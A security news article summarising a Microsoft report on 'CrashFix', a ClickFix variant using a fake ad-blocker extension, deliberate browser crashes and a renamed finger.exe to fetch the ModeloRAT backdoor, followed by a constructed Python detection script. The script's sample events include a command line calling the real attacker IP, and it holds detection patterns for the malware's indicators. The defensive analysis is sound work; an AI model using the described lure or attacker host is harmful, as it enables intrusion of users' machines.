CrashFix attack life cycle | Image: Microsoft
A dangerous evolution of the “ClickFix” social engineering campaign has been spotted in the wild, using a malicious browser extension to intentionally crash users’ browsers and trick them into infecting themselves. A new report from the Microsoft Defender Security Research Team details the emergence of “CrashFix,” a tactic that preys on user frustration to deploy a Python-based Remote Access Trojan (RAT).
This campaign marks a significant escalation in tradecraft. Instead of just showing a fake error message, the attackers now create a real problem—a denial-of-service (DoS) state—and then offer a “fix” that hands them the keys to the kingdom.
The attack typically begins with a user searching for an ad blocker. They are lured to a malicious advertisement that redirects them to the official Chrome Web Store, where they install a fake extension impersonating a legitimate tool like uBlock Origin Lite (often named “NexShield”).
Once installed, the extension lies dormant for about an hour. Then, it triggers a DoS attack against the browser, creating an infinite loop that consumes resources until the browser freezes or crashes.
“The updated tactic deliberately crashes victims’ browsers and then attempts to lure users into executing malicious commands under the pretext of restoring normal functionality,” the report explains.
When the user restarts their frozen browser, they are hit with a fake security warning claiming the browser “stopped abnormally.” The prompt instructs them to fix the issue by opening the Windows Run dialog (Win + R), pasting a command (Ctrl + V), and pressing Enter.
The command the user unknowingly pastes is a sophisticated infection script. Notably, it misuses a legitimate Windows utility called finger.exe, originally designed to retrieve user information from remote networks.
“A notable new tactic in this ClickFix variant is the misuse of the legitimate native Windows utility finger.exe,” Microsoft researchers note.
The script renames finger.exe to ct.exe to hide its tracks and uses it to reach out to an attacker-controlled IP address (69.67.173[.]30). It then retrieves a payload containing obfuscated PowerShell, which downloads the next stage of the attack.
The final payload is a fully capable Remote Access Trojan dubbed ModeloRAT. To ensure it runs on any machine, the attackers bundle a complete Python environment with the malware.
The RAT establishes persistence by creating a scheduled task named “SoftwareProtection,” designed to blend in with legitimate system services. It also modifies the registry to run automatically every time the user logs in.
Once active, ModeloRAT functions as a backdoor, allowing attackers to:
- Enumerate Network Info: It runs commands like nltest and net use to map out the domain and network.
- Check for Analysis Tools: It scans for tools such as Wireshark and Process Hacker to avoid detection and analysis.
- Target Corporate Networks: The malware specifically checks if the machine is domain-joined, suggesting a focus on enterprise targets.
The genius—and danger—of CrashFix is its circular nature. If the user doesn’t fall for the trick the first time, the extension simply waits and crashes the browser again.

“The core malicious functionality performs a denial-of-service attack against the victim’s browser by creating an infinite loop. Eventually, it presents a fake CrashFix security warning through a pop-up window to further mislead the user,” researchers warn. By creating a tangible problem that persists until the “fix” is applied, the attackers significantly increase the likelihood that a stressed user will eventually comply.
For organizations, this highlights the critical need to block unauthorized browser extensions and monitor for unusual usage of native tools like finger.exe.
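As an added example (not Microsoft's code or a query from the report), the following sketch shows what "monitor for unusual usage of finger.exe" and the other indicators above look like as detection logic over process-creation and registry events. The event field names, the sample events and the "recon tool spawned by python.exe" heuristic are constructed assumptions; only the finger.exe/ct.exe rename, the attacker IP, the task name and the recon commands come from the report.

```python
import ntpath

# Indicators from the report; everything else here is constructed.
ATTACKER_IP = "69.67.173.30"
TASK_NAME = "softwareprotection"
RECON_TOOLS = {"nltest.exe", "net.exe", "net1.exe"}
RUN_KEY = "\\currentversion\\run"

def _base(path):
    return ntpath.basename(path).lower()

def detect(event):
    """Return alert strings for one (constructed) telemetry event."""
    alerts = []
    if event["type"] == "process":
        image = _base(event["image"])
        orig = event.get("original_file_name", "").lower()
        cmd = event.get("command_line", "").lower()
        parent = _base(event.get("parent", ""))
        # finger.exe is rarely used on modern endpoints; a binary whose PE
        # OriginalFileName is finger.exe but whose on-disk name differs
        # matches the finger.exe -> ct.exe rename described in the report.
        if orig == "finger.exe":
            suffix = "" if image == "finger.exe" else " (renamed to %s)" % image
            alerts.append("finger.exe executed" + suffix)
        if ATTACKER_IP in cmd:
            alerts.append("command line references attacker IP " + ATTACKER_IP)
        if image == "schtasks.exe" and "/create" in cmd and TASK_NAME in cmd:
            alerts.append("scheduled task SoftwareProtection created")
        # Heuristic (assumption): the RAT ships its own Python runtime, so
        # domain recon tools launched by python.exe deserve a look.
        if image in RECON_TOOLS and parent == "python.exe":
            alerts.append("recon tool %s spawned by python.exe" % image)
    elif event["type"] == "registry":
        if RUN_KEY in event["key"].lower() and event.get("value", "").lower() == TASK_NAME:
            alerts.append("Run-key persistence value SoftwareProtection")
    return alerts

def scan(events):
    """Run detect() over a list of events; returns (index, alert) pairs."""
    return [(i, a) for i, e in enumerate(events) for a in detect(e)]

# Constructed sample events, loosely modelled on Sysmon-style fields.
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Users\\u\\AppData\\Local\\Temp\\ct.exe", "original_file_name": "finger.exe",
     "command_line": "ct.exe user@69.67.173.30", "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"type": "process", "image": "C:\\Windows\\System32\\schtasks.exe", "original_file_name": "schtasks.exe",
     "command_line": "schtasks /create /tn SoftwareProtection /tr C:\\Users\\u\\AppData\\Roaming\\py\\python.exe", "parent": "python.exe"},
    {"type": "process", "image": "C:\\Windows\\System32\\nltest.exe", "original_file_name": "nltest.exe",
     "command_line": "nltest /dclist:", "parent": "C:\\Users\\u\\AppData\\Roaming\\py\\python.exe"},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "value": "SoftwareProtection"},
    {"type": "process", "image": "C:\\Windows\\System32\\notepad.exe", "original_file_name": "NOTEPAD.EXE",
     "command_line": "notepad.exe", "parent": "explorer.exe"},
]

if __name__ == "__main__":
    for idx, alert in scan(SAMPLE_EVENTS):
        print(idx, alert)
```

In a real deployment the same checks map onto process-creation events (image path, OriginalFileName, command line, parent) and registry-set events from Sysmon or an EDR, where the OriginalFileName mismatch is the check that survives the rename.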